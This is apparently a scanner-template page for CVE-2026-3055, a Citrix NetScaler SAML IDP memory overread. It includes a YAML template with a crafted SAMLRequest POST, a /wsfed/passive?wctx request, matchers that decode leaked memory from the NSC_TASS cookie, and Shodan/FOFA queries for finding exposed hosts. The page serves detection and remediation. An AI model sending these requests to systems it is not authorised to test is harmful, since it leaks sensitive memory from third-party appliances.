Citrix NetScaler SAML IDP - Memory Overread

CVE-2026-3055
Verified

Description

NetScaler ADC and NetScaler Gateway contain an insufficient input validation vulnerability when configured as a SAML IDP. The flaw leads to a memory overread, potentially letting attackers access sensitive memory. Exploitation requires the appliance to be configured as a SAML IDP.

Severity

Critical

Published Date

March 30, 2026

Template Author

watchtowr, shaikhyaser, dhiyaneshdk

CVE-2026-3055.yaml
id: CVE-2026-3055

info:
  name: Citrix NetScaler SAML IDP - Memory Overread
  author: watchtowr,shaikhyaser,DhiyaneshDk
  severity: critical
  description: |
    NetScaler ADC and NetScaler Gateway contain an insufficient input validation vulnerability when configured as a SAML IDP, leading to memory overread, letting attackers potentially access sensitive memory, exploit requires configuration as SAML IDP
  impact: |
    Attackers can cause memory overread, potentially exposing sensitive information or causing application instability.
  remediation: Update to the latest version with the fix for this vulnerability.
  reference:
    - https://support.citrix.com/support-home/kbsearch/article?articleNumber=CTX696300
    - https://labs.watchtowr.com/the-sequels-are-never-as-good-but-were-still-in-pain-citrix-netscaler-cve-2026-3055-memory-overread/
    - https://labs.watchtowr.com/please-we-beg-just-one-weekend-free-of-appliances-citrix-netscaler-cve-2026-3055-memory-overread-part-2/
  metadata:
    verified: true
    max-request: 2
    shodan-query:
      - title:"NetScaler Gateway"
      - title:"NetScaler AAA"
      - http.favicon.hash:-1166125415
      - http.favicon.hash:-1292923998
    fofa-query:
      - title="NetScaler Gateway"
      - title="NetScaler AAA"
      - icon_hash="-1166125415"
      - icon_hash="-1292923998"
  tags: cve,cve2026,netscaler,citrix,exposure,kev,vkev,vuln

flow: http(1) || http(2)

http:
  - raw:
      - |
        POST /saml/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Accept-Encoding: gzip

        SAMLRequest=PHNhbWxwOkF1dGhuUmVxdWVzdCB4bWxuczpzYW1scD0idXJuOm9hc2lzOm5hbWVzOnRjOlNBTUw6Mi4wOnByb3RvY29sIiANCnhtbG5zOnNhbWw9InVybjpvYXNpczpuYW1lczp0YzpTQU1MOjIuMDphc3NlcnRpb24iICANCklEPSJfMSINClZlcnNpb249IjIuMCIgUHJvdmlkZXJOYW1lPSJteSBwcm92aWRlciIgDQpEZXN0aW5hdGlvbj0iaHR0cDovL3dhdGNodG93ci9zYW1sLnBocCIgDQpQcm90b2NvbEJpbmRpbmc9InVybjpvYXNpczpuYW1lczp0YzpTQU1MOjIuMDpiaW5kaW5nczpIVFRQLVBPU1QiIA0KPg0KICA8c2FtbDpJc3N1ZXI%2BaHR0cDovL3dhdGNodG93ci9zYW1sLnBocDwvc2FtbDpJc3N1ZXI%2BDQo8L3NhbWxwOkF1dGhuUmVxdWVzdD4%3D

      - |
        GET /wsfed/passive?wctx HTTP/1.1
        Host: {{Hostname}}

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - regex('(?i)NSC_TASS=[A-Za-z0-9+/]+=*', set_cookie)
          - 'status_code == 302'
          - 'contains(base64_decode(nsc_tass), "wctx=")'
          - '!contains(body, "Parsing of presented Assertion failed")'
        condition: and

    extractors:
      - type: dsl
        dsl:
          - base64_decode(nsc_tass)
# digest: 4a0a004730450220406d2dccc32a82831ddc8dfdec81d513c70d55da7324594a5ead9cdcf01a770102210086e0c3ca49f0abb8959e67730de028261f4ef59e17332d52ac062fc0e84d5a40:922c64590222798bb761d5b6d8e72950
9.5 Severity

References

https://support.citrix.com/support-home/kbsearch/article?articleNumber=CTX696300
https://labs.watchtowr.com/the-sequels-are-never-as-good-but-were-still-in-pain-citrix-netscaler-cve-2026-3055-memory-overread/
https://labs.watchtowr.com/please-we-beg-just-one-weekend-free-of-appliances-citrix-netscaler-cve-2026-3055-memory-overread-part-2/

Remediation Steps

Update to the latest version with the fix for this vulnerability.